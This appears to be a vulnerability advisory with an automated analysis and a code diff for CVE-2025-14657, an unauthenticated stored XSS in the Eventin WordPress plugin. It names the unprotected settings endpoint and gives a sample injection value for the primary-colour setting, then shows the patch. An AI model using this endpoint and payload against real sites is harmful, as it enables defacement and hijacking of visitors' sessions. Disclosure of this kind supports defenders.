What is CVE-2025-14657?

CVE-2025-14657 is a high-severity vulnerability in the Eventin WordPress plugin, versions 4.0.51 and earlier. It allows unauthenticated attackers to modify plugin settings and inject malicious scripts, leading to stored cross-site scripting (XSS) attacks.

How does the vulnerability work?

The vulnerability arises from a missing authorization check in the plugin’s REST API, allowing unauthenticated requests to modify settings. Attackers can exploit this by sending specially crafted POST requests to inject malicious JavaScript, which executes when users load pages that utilize Eventin styles.

Who is affected by this vulnerability?

Any WordPress site using the Eventin plugin version 4.0.51 or earlier is vulnerable. Administrators should check their installed plugin versions to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Eventin plugin installed. If it is version 4.0.51 or earlier, your site is at risk. Additionally, you can review the plugin’s settings and API access logs for any unauthorized changes.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Eventin plugin to version 4.0.52 or later, where the issue has been patched. Ensure you also review your site’s security settings and consider implementing additional security measures, such as web application firewalls.

What does the CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. Administrators should prioritize addressing this vulnerability to prevent potential exploitation.

What are the practical risks associated with this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, administrative account takeover, content defacement, or malware distribution. Since the payload is stored, it can affect all visitors to the site until the settings are manually corrected.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can send a malicious payload to the plugin’s settings endpoint without authentication. This payload can inject JavaScript that executes in the context of any user viewing the affected pages, showcasing the vulnerability’s impact.

What steps should I take after updating the plugin?

After updating the plugin, review your site’s security practices, including user permissions and access controls. Monitor your site for any unusual activity and consider conducting a security audit to identify any other potential vulnerabilities.

Is there a way to prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, regularly update all plugins and themes, use security plugins to monitor for vulnerabilities, and conduct periodic security audits. Additionally, implement strict access controls and input validation to minimize risks.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately take it offline to prevent further damage. Investigate the extent of the breach, restore from a clean backup, and consider consulting with a security professional for a thorough assessment.

Where can I find more information about this vulnerability?

More information about CVE-2025-14657 can be found on the official CVE database, security blogs, and the plugin’s repository. Staying informed about security updates and vulnerabilities is essential for maintaining a secure WordPress environment.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14657: Eventin – Event Manager, Event Booking, Calendar, Tickets and Registration Plugin (AI Powered) <= 4.0.51 – Missing Authorization to Unauthenticated Stored Cross-Site Scripting via 'post_settings' (wp-event-solution)

CVE ID CVE-2025-14657

Plugin wp-event-solution

Severity High (CVSS 7.2)

CWE 862

Vulnerable Version 4.0.51

Patched Version 4.0.52

Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14657:
The Eventin WordPress plugin (versions ≤4.0.51) contains an unauthenticated stored cross-site scripting (XSS) vulnerability. This flaw allows attackers without authentication to modify plugin settings and inject malicious scripts that execute whenever Eventin styles load on a page. The vulnerability stems from missing authorization checks combined with insufficient input sanitization.

The root cause is a missing capability check in the ‘post_settings’ function within the plugin’s REST API handler. The vulnerable code resides in wp-event-solution/base/api-handler.php. The ‘permision_check’ method (line 67) originally returned ‘true’ unconditionally, granting access to all API endpoints without authentication. This lack of authorization allowed unauthenticated requests to reach the settings update functionality. Additionally, the ‘etn_primary_color’ and ‘etn_secondary_color’ settings in wp-event-solution/base/Enqueue/register.php (lines 225-241) lacked proper sanitization before being output in CSS.

Exploitation involves sending a POST request to the plugin’s REST API settings endpoint (/wp-json/eventin/v1/settings) without authentication. The attacker sets the ‘etn_primary_color’ parameter to a malicious payload like ‘red;}alert(document.domain)’. When the plugin generates CSS stylesheets, this unsanitized value is embedded directly into the page’s CSS, executing the JavaScript payload whenever Eventin styles load.

The patch addresses both authorization and sanitization flaws. In api-handler.php, the ‘permision_check’ method was completely rewritten (lines 64-88) to verify nonces via the ‘X-WP-Nonce’ header and check ‘manage_options’ capability for administrative actions like ‘settings’. The plugin now rejects unauthenticated requests. For sanitization, the register.php file was updated to use ‘sanitize_hex_color()’ on color values (lines 228, 234), ensuring only valid hex colors are accepted, with fallbacks to default values if sanitization fails.

Successful exploitation allows unauthenticated attackers to inject arbitrary JavaScript that executes in the context of any user viewing pages with Eventin styles. This can lead to session hijacking, administrative account takeover, content defacement, or malware distribution. The stored nature means the payload persists until settings are manually corrected, affecting all site visitors.

Differential between vulnerable and patched code

Code Diff

--- a/wp-event-solution/base/Container/Container.php
+++ b/wp-event-solution/base/Container/Container.php
@@ -80,13 +80,13 @@
      */
     public function resolve( string $class_name ): object {
         if ( ! class_exists( $class_name ) ) {
-            throw new Exception( "Class: {$class_name} does not exist" );
+            throw new Exception( esc_html( "Class: {$class_name} does not exist" ) );
         }

         $reflection_class = new ReflectionClass( $class_name );

         if ( ! $reflection_class->isInstantiable() ) {
-            throw new DependencyIsNotInstantiableException( "Class: {$class_name} is not instantiable" );
+            throw new DependencyIsNotInstantiableException( esc_html( "Class: {$class_name} is not instantiable" ) );
         }

         if ( null === $reflection_class->getConstructor() ) {
@@ -120,7 +120,7 @@
                 if ( $parameter->isDefaultValueAvailable() ) {
                     $dependencies[] = $parameter->getDefaultValue();
                 } else {
-                    throw new DependencyHasNoDefaultValueException( "Class: {$parameter->name} dependency can not be resolved" );
+                    throw new DependencyHasNoDefaultValueException( esc_html( "Class: {$parameter->name} dependency can not be resolved" ) );
                 }
             } else {
                 $dependencies[] = $this->get( $dependency );
--- a/wp-event-solution/base/Enqueue/admin.php
+++ b/wp-event-solution/base/Enqueue/admin.php
@@ -98,7 +98,7 @@
         $screen    = get_current_screen();
         $screen_id = $screen->id;

-        if ( 'toplevel_page_eventin' === $screen_id ) {
+        if ( 'toplevel_page_eventin' === $screen_id && class_exists( 'EventinAI' ) ) {
             wp_enqueue_style( 'etn-ai' );
             wp_enqueue_script( 'etn-ai' );
         }
--- a/wp-event-solution/base/Enqueue/register.php
+++ b/wp-event-solution/base/Enqueue/register.php
@@ -225,14 +225,21 @@
 		$primary_color   = '#5D78FF';
 		$secondary_color = '';

-		// cart bg color.
+		// SECURITY: Sanitize color values to prevent XSS
 		if ( ! empty( $settings['etn_primary_color'] ) ) {
-			$primary_color = $settings['etn_primary_color'];
+			$primary_color = sanitize_hex_color( $settings['etn_primary_color'] );
+			// Fallback to default if sanitization fails
+			if ( empty( $primary_color ) ) {
+				$primary_color = '#5D78FF';
+			}
 		}

-		// cart icon color.
 		if ( ! empty( $settings['etn_secondary_color'] ) ) {
-			$secondary_color = $settings['etn_secondary_color'];
+			$secondary_color = sanitize_hex_color( $settings['etn_secondary_color'] );
+			// Fallback to empty if sanitization fails
+			if ( empty( $secondary_color ) && ! empty( $settings['etn_secondary_color'] ) ) {
+				$secondary_color = '';
+			}
 		}

 		$etn_custom_css .= "
--- a/wp-event-solution/base/Exporter/ExporterFactory.php
+++ b/wp-event-solution/base/Exporter/ExporterFactory.php
@@ -24,9 +24,9 @@

             case 'json':
                 return new JsonExporter();
-
+
             default:
-                throw new Exception( __( 'Unknown format', 'eventin' ) );
+                throw new Exception( esc_html__( 'Unknown format', 'eventin' ) );
         }
     }
 }
--- a/wp-event-solution/base/Exporter/PostExporter.php
+++ b/wp-event-solution/base/Exporter/PostExporter.php
@@ -36,6 +36,6 @@
             return new $exporters[$post_type]();
         }

-        throw new Exception( __( 'Unknown Post Type', 'eventin' ) );
+        throw new Exception( esc_html__( 'Unknown Post Type', 'eventin' ) );
     }
 }
--- a/wp-event-solution/base/Importer/PostImporter.php
+++ b/wp-event-solution/base/Importer/PostImporter.php
@@ -37,6 +37,6 @@
             return new $exporters[$post_type]();
         }

-        throw new Exception( __( 'Unknown Post Type', 'eventin' ) );
+        throw new Exception( esc_html__( 'Unknown Post Type', 'eventin' ) );
     }
 }
--- a/wp-event-solution/base/Importer/ReaderFactory.php
+++ b/wp-event-solution/base/Importer/ReaderFactory.php
@@ -23,7 +23,7 @@
             case ('text/csv' || 'application/vnd.ms-excel'):
                 return new CSVReader( $file_name );
             default:
-                throw new Exception( __( 'You must provide a valid file type', 'eventin' ) );
+                throw new Exception( esc_html__( 'You must provide a valid file type', 'eventin' ) );
         }
     }
 }
--- a/wp-event-solution/base/Mails/Mailable.php
+++ b/wp-event-solution/base/Mails/Mailable.php
@@ -101,6 +101,6 @@
             return ob_get_clean();
         }

-        throw new Exception("Template not found: {$content}");
+        throw new Exception( esc_html( "Template not found: {$content}" ) );
     }
 }
--- a/wp-event-solution/base/api-handler.php
+++ b/wp-event-solution/base/api-handler.php
@@ -50,9 +50,6 @@
      */
     public function callback( $request ) {
         $this->request = $request;
-        if ( $this->request->get_params()['action'] == 'settings'  ) {
-            $this->request->set_header( 'X-WP-Nonce', wp_create_nonce( 'wp_rest' ) );
-        }

         $action_class = strtolower( $this->request->get_method() ) . '_' . $this->request['action'];

@@ -67,8 +64,29 @@
      *
      * @return  bool
      */
-    public function permision_check() {
-        return true;
+    public function permision_check($request) {
+        // Verify nonce for all API requests
+        $nonce = $request->get_header( 'X-WP-Nonce' );
+
+        if ( empty( $nonce ) ) {
+            return false;
+        }
+
+        // For administrative actions, also require manage_options capability
+        $admin_actions = ['settings'];
+        $action = $this->request['action'] ?? '';
+
+        if ( in_array( $action, $admin_actions ) ) {
+            return current_user_can( 'manage_options' ) && wp_verify_nonce( $nonce, 'wp_rest' );
+        }
+
+        // Verify the nonce
+        if ( wp_verify_nonce( $nonce, 'wp_rest' ) ) {
+            return true;
+        }
+
+        // Nonce is valid - allow access
+        return false;
     }

 }
--- a/wp-event-solution/base/post-model.php
+++ b/wp-event-solution/base/post-model.php
@@ -65,7 +65,7 @@
      */
     public function __get( $key ) {
         if ( ! isset( $this->data[$key] ) ) {
-            throw new Exception( __( 'Undefined property', 'eventin' ) );
+            throw new Exception( esc_html__( 'Undefined property', 'eventin' ) );
         }

         $data = $this->get_data();
@@ -83,9 +83,9 @@
      */
     public static function __callStatic( $method, $arguments ) {
         if ( ! method_exists( new self, $method ) ) {
-            throw new Exception( __( 'Call to undefined method', 'eventin' ) );
+            throw new Exception( esc_html__( 'Call to undefined method', 'eventin' ) );
         }
-
+
         call_user_func( $method, $arguments );
     }

--- a/wp-event-solution/build/js/dashboard.asset.php
+++ b/wp-event-solution/build/js/dashboard.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('moment', 'react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-media-utils', 'wp-primitives', 'wp-url'), 'version' => '9792bc0ef9996b66ecd0');
+<?php return array('dependencies' => array('moment', 'react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-media-utils', 'wp-primitives', 'wp-url'), 'version' => 'abe17fa727faa92a9750');
--- a/wp-event-solution/build/js/elementor-scripts.asset.php
+++ b/wp-event-solution/build/js/elementor-scripts.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '2f34a0e8b19af63855d0');
+<?php return array('dependencies' => array(), 'version' => '3f5efd310724b1700acf');
--- a/wp-event-solution/build/js/event-manager-public.asset.php
+++ b/wp-event-solution/build/js/event-manager-public.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('wp-i18n'), 'version' => '1113e5e0400b38ee2e0b');
+<?php return array('dependencies' => array('wp-i18n'), 'version' => '0d0abf5d7589aadd4d59');
--- a/wp-event-solution/build/js/feedback-modal.asset.php
+++ b/wp-event-solution/build/js/feedback-modal.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'wp-element', 'wp-i18n'), 'version' => '9ac0481aa6ba6e676411');
+<?php return array('dependencies' => array('react', 'wp-element', 'wp-i18n'), 'version' => '3f66227226dc515f3946');
--- a/wp-event-solution/build/js/gutenberg-blocks.asset.php
+++ b/wp-event-solution/build/js/gutenberg-blocks.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-primitives', 'wp-server-side-render'), 'version' => '229b5cfeab83afaf21a2');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-primitives', 'wp-server-side-render'), 'version' => '63c5c5e00a6b98e73f80');
--- a/wp-event-solution/build/js/i18n-loader.asset.php
+++ b/wp-event-solution/build/js/i18n-loader.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('wp-i18n'), 'version' => 'fd6ff2059f74bf18ab54');
+<?php return array('dependencies' => array('wp-i18n'), 'version' => '8c994aa33ece729f1210');
--- a/wp-event-solution/build/js/index-ai-script.asset.php
+++ b/wp-event-solution/build/js/index-ai-script.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react'), 'version' => 'bc40056e8534d11a5c10');
+<?php return array('dependencies' => array('react'), 'version' => 'cd82cdece798591ada85');
--- a/wp-event-solution/build/js/index-calendar.asset.php
+++ b/wp-event-solution/build/js/index-calendar.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('moment', 'react', 'react-dom', 'wp-element', 'wp-html-entities', 'wp-i18n'), 'version' => '3db22200b7534bc17e1a');
+<?php return array('dependencies' => array('moment', 'react', 'react-dom', 'wp-element', 'wp-html-entities', 'wp-i18n'), 'version' => '83e5e90e80c510baa283');
--- a/wp-event-solution/build/js/index-onboard.asset.php
+++ b/wp-event-solution/build/js/index-onboard.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-compose', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n'), 'version' => '5eb924796c96fc96945d');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-compose', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n'), 'version' => '8d0e9d97e143585635eb');
--- a/wp-event-solution/build/js/module-purchase.asset.php
+++ b/wp-event-solution/build/js/module-purchase.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('moment', 'react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-media-utils', 'wp-primitives', 'wp-url'), 'version' => 'abb1de188954c0f24dd7');
+<?php return array('dependencies' => array('moment', 'react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-media-utils', 'wp-primitives', 'wp-url'), 'version' => '0c39153ba677a4bc7945');
--- a/wp-event-solution/build/js/packages.asset.php
+++ b/wp-event-solution/build/js/packages.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('moment', 'react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-media-utils', 'wp-primitives', 'wp-url'), 'version' => 'f323371f1a4f0ae3b100');
+<?php return array('dependencies' => array('moment', 'react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-media-utils', 'wp-primitives', 'wp-url'), 'version' => 'f3dcdf5845efeb2efd60');
--- a/wp-event-solution/build/js/template-builder-header-toolbar.asset.php
+++ b/wp-event-solution/build/js/template-builder-header-toolbar.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-api-fetch', 'wp-compose', 'wp-data', 'wp-edit-post', 'wp-element', 'wp-html-entities', 'wp-i18n', 'wp-plugins', 'wp-url'), 'version' => '894d21f9b4b79f6175f1');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-api-fetch', 'wp-compose', 'wp-data', 'wp-edit-post', 'wp-element', 'wp-html-entities', 'wp-i18n', 'wp-plugins', 'wp-url'), 'version' => 'b947f34e37fca06ae80c');
--- a/wp-event-solution/core/Attendee/Api/AttendeeController.php
+++ b/wp-event-solution/core/Attendee/Api/AttendeeController.php
@@ -400,6 +400,32 @@
     public function update_item( $request ) {
         $prepared_item = $this->prepare_item_for_database( $request );

+        $order_id = get_post_meta( $request['id'], 'eventin_order_id', true );
+        $previous_status = get_post_meta( $request['id'], 'etn_status', true );
+        $current_status = $prepared_item['etn_status'];
+
+        if ( $current_status == 'success' && $previous_status != 'success' ) {
+            $order_status = get_post_meta( $order_id, 'status', true );
+            if ($order_status != 'completed') {
+                return new WP_Error(
+                    'attendee_update_error',
+                    __('Attendee status can not be success if order status is not completed.', 'eventin'),
+                    array('status' => 500)
+                );
+            }
+        }
+
+        if ( $current_status == 'failed' && $previous_status != 'failed' ) {
+            $order_status = get_post_meta( $order_id, 'status', true );
+            if ($order_status == 'completed') {
+                return new WP_Error(
+                    'attendee_update_error',
+                    __('Attendee status can not be failed if order status is completed.', 'eventin'),
+                    array('status' => 500)
+                );
+            }
+        }
+
         if ( is_wp_error( $prepared_item ) ) {
             return $prepared_item;
         }
--- a/wp-event-solution/core/Attendee/AttendeeExporter.php
+++ b/wp-event-solution/core/Attendee/AttendeeExporter.php
@@ -106,10 +106,13 @@
         }

         if ( $extra_fields ) {
-            foreach ( $extra_fields as $value ) {
+            foreach ( $extra_fields as $index=>$value ) {
                 $key                        = Etn_ProUtilsHelper::generate_name_from_label( "etn_attendee_extra_field_", $value['label'] );
                 $this->extra_fields[$key]   = $value['label'];
                 $extra_field_value          = get_post_meta( $attendee_id, $key, true );
+                if(empty($extra_field_value)){
+                    $extra_field_value = get_post_meta( $attendee_id, $key . '_' . $index+1, true );
+                }
                 switch($value['field_type']){
                     case 'radio':
                         $data[$key] = $extra_field_value;
@@ -131,7 +134,7 @@
                     break;

                     default:
-                        $data[$key] = get_post_meta( $attendee_id, $key, true );
+                        $data[$key] = $extra_field_value;
                 }
             }
         }
--- a/wp-event-solution/core/Attendee/TicketTemplate.php
+++ b/wp-event-solution/core/Attendee/TicketTemplate.php
@@ -65,11 +65,11 @@
 			$get_arr = filter_input_array( INPUT_GET, FILTER_SANITIZE_FULL_SPECIAL_CHARS );

 			if ( empty( $get_arr["attendee_id"] ) || empty( $get_arr["etn_info_edit_token"] ) ) {
-				wp_die( __( 'Invalid data', 'eventin' ));
+				wp_die( esc_html__( 'Invalid data', 'eventin' ) );
 			}

 			if ( ! $this->verify_attendee_edit_token( $get_arr["attendee_id"], $get_arr["etn_info_edit_token"] ) ) {
-				wp_die( __( 'Invalid data', 'eventin' ));
+				wp_die( esc_html__( 'Invalid data', 'eventin' ) );
 			}
 			$attendee_id = $get_arr["attendee_id"];
 			$event_id    = get_post_meta( $attendee_id, "etn_event_id", true );
--- a/wp-event-solution/core/Blocks/BlockService.php
+++ b/wp-event-solution/core/Blocks/BlockService.php
@@ -1,54 +1,57 @@
 <?php
 namespace EventinBlocks;

-use EventinInterfacesHookableInterface;
+use EventinBlocksBlockTypesAttendeeInfo;
 use EventinBlocksBlockTypesBuyTicket;
+use EventinBlocksBlockTypesContainer;
+use EventinBlocksBlockTypesCustomButton;
+use EventinBlocksBlockTypesCustomImage;
+use EventinBlocksBlockTypesDiamondSeparator;
 use EventinBlocksBlockTypesEventAddToCalender;
+use EventinBlocksBlockTypesEventAttendee;
 use EventinBlocksBlockTypesEventBanner;
+use EventinBlocksBlockTypesEventCalendar;
 use EventinBlocksBlockTypesEventCategory;
 use EventinBlocksBlockTypesEventCountDownTimer;
 use EventinBlocksBlockTypesEventDateTime;
 use EventinBlocksBlockTypesEventDescription;
-use EventinBlocksBlockTypesEventOrganizer;
-use EventinBlocksBlockTypesEventSchedule;
-use EventinBlocksBlockTypesEventSpeaker;
-use EventinBlocksBlockTypesEventTag;
-use EventinBlocksBlockTypesEventVenue;
-use EventinBlocksBlockTypesEventLogo;
 use EventinBlocksBlockTypesEventFaq;
+use EventinBlocksBlockTypesEventInfo;
 use EventinBlocksBlockTypesEventList;
+use EventinBlocksBlockTypesEventLogo;
+use EventinBlocksBlockTypesEventOrganizer;
 use EventinBlocksBlockTypesEventRSVP;
+use EventinBlocksBlockTypesEventSchedule;
 use EventinBlocksBlockTypesEventSocial;
+use EventinBlocksBlockTypesEventSpeaker;
+use EventinBlocksBlockTypesEventTag;
 use EventinBlocksBlockTypesEventTitle;
+use EventinBlocksBlockTypesEventVenue;
+use EventinBlocksBlockTypesQRCodeBlock;
 use EventinBlocksBlockTypesRecurringEvent;
 use EventinBlocksBlockTypesRelatedEventsEnhanced;
-use EventinBlocksBlockTypesEventCalendar;
 use EventinBlocksBlockTypesScheduleTab;
 use EventinBlocksBlockTypesSpeakerList;
-use EventinBlocksBlockTypesZoomMeeting;
-use EventinBlocksBlockTypesTicket;
-use EventinBlocksBlockTypesQRCodeBlock;
 use EventinBlocksBlockTypesTemplateContainer;
 use EventinBlocksBlockTypesTemplateHeading;
-use EventinBlocksBlockTypesDiamondSeparator;
-use EventinBlocksBlockTypesAttendeeInfo;
-use EventinBlocksBlockTypesEventInfo;
+use EventinBlocksBlockTypesTicket;
 use EventinBlocksBlockTypesTicketInfo;
-use EventinBlocksBlockTypesContainer;
-use EventinBlocksBlockTypesCustomImage;
-use EventinBlocksBlockTypesCustomButton;
+use EventinBlocksBlockTypesZoomMeeting;
+use EventinInterfacesHookableInterface;

 /**
  * Block Service Class
  */
-class BlockService implements HookableInterface {
+class BlockService implements HookableInterface
+{
     /**
      * Register all hooks
      *
      * @return  void
      */
-    public function register_hooks(): void {
-        add_filter( 'eventin_gutenberg_blocks', [ $this, 'add_blocks' ],5 );
+    public function register_hooks(): void
+    {
+        add_filter('eventin_gutenberg_blocks', [$this, 'add_blocks'], 5);
     }

     /**
@@ -56,7 +59,8 @@
      *
      * @return  array
      */
-    public function add_blocks( $blocks ) {
+    public function add_blocks($blocks)
+    {
         $new_blocks = [
             EventVenue::class,
             BuyTicket::class,
@@ -93,10 +97,9 @@
             Container::class,
             CustomImage::class,
             CustomButton::class,
+            EventAttendee::class,
         ];

-        return array_unique( array_merge( $blocks, $new_blocks ) );
+        return array_unique(array_merge($blocks, $new_blocks));
     }
 }
-
-
--- a/wp-event-solution/core/Blocks/BlockTypes/AbstractBlock.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/AbstractBlock.php
@@ -185,9 +185,12 @@
      * @return string[]|null
      */
     protected function get_block_type_style() {
-        $this->register_style( 'eventin-blocks-style-' . $this->block_name, $this->get_block_asset_build_path( $this->block_name, 'css' ), [], 'all', true );
+        // Register the main blocks style if not already registered
+        if ( ! wp_style_is( 'etn-blocks-style', 'registered' ) ) {
+            wp_register_style( 'etn-blocks-style', Wpeventin::plugin_url() . 'build/css/etn-block-styles.css', [], Wpeventin::version(), 'all' );
+        }

-        return [ 'eventin-blocks-style', 'wc-blocks-style-' . $this->block_name ];
+        return [ 'etn-blocks-style' ];
     }

     /**
@@ -279,7 +282,8 @@
             $css .= "}n";
         }

-        return $css;
+        $safe_css = preg_replace( '/<scriptb[^>]*>(.*?)</script>/is', '', $css );
+        return $safe_css;
     }

     /**
@@ -368,6 +372,14 @@
             return $path;
         }

+        // Fallback to source directory if build directory doesn't exist
+        $source_dir = Wpeventin::plugin_dir() . 'src/blocks/';
+        $source_path = $source_dir . $this->block_name . '/block.json';
+
+        if ( file_exists( $source_path ) ) {
+            return $source_path;
+        }
+
         return false;
     }

--- a/wp-event-solution/core/Blocks/BlockTypes/BuyTicket.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/BuyTicket.php
@@ -29,6 +29,8 @@
      */
     protected function render($attributes, $content, $block)
     {
+        $style_variant = ! empty($attributes['styleVariant']) ? $attributes['styleVariant'] : 'style-1';
+
         $container_class = ! empty($attributes['containerClassName']) ? $attributes['containerClassName'] : '';
         $styles = ! empty( $attributes['styles'] ) ? $attributes['styles'] : [];
         // Check if we're in editor/admin
@@ -62,9 +64,9 @@

         ob_start();

-
+
         ?>
-        <?php echo $this->render_frontend_css( $styles, $container_class ); ?>
+        <?php echo $this->render_frontend_css( $styles, esc_attr( $container_class ) ); ?>
         <?php
         require_once Wpeventin::templates_dir() . 'event/parts/buy-ticket.php';
         ?>
--- a/wp-event-solution/core/Blocks/BlockTypes/EventAddToCalender.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventAddToCalender.php
@@ -42,9 +42,9 @@

         ob_start();

-
+
         ?>
-        <?php echo $this->render_frontend_css( $styles, $container_class ); ?>
+        <?php echo $this->render_frontend_css( $styles, esc_attr( $container_class ) ); ?>
         <?php
         require_once Wpeventin::templates_dir() . 'event/parts/event-add-calender.php';
         ?>
--- a/wp-event-solution/core/Blocks/BlockTypes/EventAttendee.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventAttendee.php
@@ -0,0 +1,91 @@
+<?php
+    namespace EventinBlocksBlockTypes;
+
+    use EtnCoreEventEvent_Model;
+    use EventinBlocksBlockTypesAbstractBlock;
+    use Wpeventin;
+
+    /**
+     * Event Attendee Gutenberg block
+     */
+    class EventAttendee extends AbstractBlock
+    {
+        /**
+         * Block namespace.
+         *
+         * @var string
+         */
+        protected $namespace = 'eventin-pro';
+
+        /**
+         * Block name.
+         *
+         * @var string
+         */
+        protected $block_name = 'event-attendee';
+
+        /**
+         * Include and render the block
+         *
+         * @param   array  $attributes  Block attributes. Default empty array
+         * @param   string  $content     Block content. Default empty string
+         * @param   WP_Block  $block       Block instance
+         *
+         * @return  string Rendered block type output
+         */
+        protected function render($attributes, $content, $block)
+        {
+            $container_class = ! empty($attributes['containerClassName']) ? $attributes['containerClassName'] : '';
+            $items_per_row   = ! empty($attributes['itemsPerRow']) ? intval($attributes['itemsPerRow']) : 3;
+            $styles          = ! empty($attributes['styles']) ? $attributes['styles'] : [];
+
+            if ($this->is_editor()) {
+                $event_id = ! empty($attributes['eventId']) ? intval($attributes['eventId']) : 0;
+
+                if ($event_id == 0) {
+                    $template = new EventinTemplateTemplateModel(get_the_ID());
+                    $event_id = $template->get_preview_event_id();
+                }
+            } else if ('etn-template' == get_post_type(get_the_ID())) {
+                $template = new EventinTemplateTemplateModel(get_the_ID());
+                $event_id = $template->get_preview_event_id();
+            } else {
+                $event_id = get_the_ID();
+            }
+
+            $event           = new Event_Model($event_id);
+            $event_attendees = $event->get_attendees();
+
+            $attendee_page_url = get_post_meta($event_id, 'attende_page_link', true);
+            ob_start();
+        ?>
+        <?php
+            // Generate CSS with !important for attendee block to override SCSS
+                    $frontend_css = $this->generate_frontend_css($styles, $container_class);
+                    if (! empty($frontend_css)) {
+                        // Add !important to common properties that need to override SCSS
+                        $important_properties = ['width', 'height', 'font-size', 'color', 'font-weight', 'line-height', 'margin', 'padding', 'border-radius'];
+                        foreach ($important_properties as $prop) {
+                            $frontend_css = preg_replace(
+                                "/({$prop}):s*([^;!]+?)(?!s*!important)s*;/im",
+                                "$1: $2 !important;",
+                                $frontend_css
+                            );
+                        }
+
+                        // Ensure img always uses 100% width/height to fill container, overriding any saved styles
+                        $avatar_img_selector = ".{$container_class} .etn-attendee-item .etn-attendee-avatar img";
+                        $frontend_css .= "n{$avatar_img_selector} {n";
+                        $frontend_css .= "  width: 100% !important;n";
+                        $frontend_css .= "  height: 100% !important;n";
+                        $frontend_css .= "}n";
+
+                        echo '<style>' . $frontend_css . '</style>';
+                    }
+                ?>
+        <?php
+            $items_per_row = $items_per_row; // Make available to template
+                    require_once Wpeventin::templates_dir() . 'event/parts/event-attendee.php';
+                    return ob_get_clean();
+                }
+        }
--- a/wp-event-solution/core/Blocks/BlockTypes/EventBanner.php
+++ b/wp-event-solution/core/Blocks/BlockTypes/EventBanner.php
@@ -1,61 +1,83 @@
 <?php
-namespace EventinBlocksBlockTypes;
+    namespace EventinBlocksBlockTypes;

-use EtnCoreEventEvent_Model;
-use EventinBlocksBlockTypesAbstractBlock;
-use Wpeventin;
-
-/**
- * Event Banner Gutenberg block
- */
-class EventBanner extends AbstractBlock {
-    /**
-     * Block name.
-     *
-     * @var string
-     */
-    protected $block_name = 'event-banner';
+    use EtnCoreEventEvent_Model;
+    use EventinBlocksBlockTypesAbstractBlock;
+    use Wpeventin;

     /**
-     * Include and render the block
-     *
-     * @param   array  $attributes  Block attributes. Default empty array
-     * @param   string  $content     Block content. Default empty string
-     * @param   WP_Block  $block       Block instance
-     *
-     * @return  string Rendered block type output
+     * Event Banner Gutenberg block
      */
-    protected function render( $attributes, $content, $block ) {
-        $container_class = ! empty( $attributes['containerClassName'] ) ? $attributes['containerClassName'] : '';
-        $styles = ! empty( $attributes['styles'] ) ? $attributes['styles'] : [];
+    class EventBanner extends AbstractBlock
+    {
+        /**
+         * Block name.
+         *
+         * @var string
+         */
+        protected $block_name = 'event-banner';
+
+        /**
